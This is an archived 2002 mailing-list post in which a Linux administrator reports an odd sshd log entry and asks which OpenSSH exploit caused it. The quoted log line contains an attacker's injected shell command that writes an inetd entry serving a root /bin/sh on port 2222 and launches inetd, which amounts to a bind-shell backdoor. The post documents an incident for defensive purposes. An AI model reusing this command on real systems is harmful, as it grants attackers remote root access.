I run OpenSSH 3.3p1 on linux (sparc) and found these line in my /var/log/messages: Jun 28 22:27:27 www sshd[21761]: Bad protocol version identification 'echo "2222 stream tcp nowait root /bin/sh sh -i">> /tmp/h;/usr/sbin/inetd /tmp/hn/inecho "2222 strea' from 192.192.230.233 Doesn't look like the OpenSSH exploit for OpenBSD 3.1 posted by Christophe Devine on Bugtraq (www.der-keiler.de/Mailing-Lists/securityfocus/bugtraq/2002-06/0354.html) to me. Is another exploit known which produces such an output? Ulrich Keil -- http://www.der-keiler.de PGP Fingerprint: 5FA4 4C01 8D92 A906 E831 CAF1 3F51 8F47 1233 9AAD Public key available at http://www.der-keiler.de/uk/pgp-key.asc -----BEGIN GEEK CODE BLOCK----- Version: 3.12 GCS d- s-:- a-- C++ UL+++ P++ L+++ E--- W+++ N++ o- K- w-- O- M- V- PS PE Y+ PGP++ t+ 5 X R tv b+ DI- D++ G e h-- r++ y+ ------END GEEK CODE BLOCK------
This archive was generated by hypermail 2b30 : Mon Jul 01 2002 - 12:52:40 PDT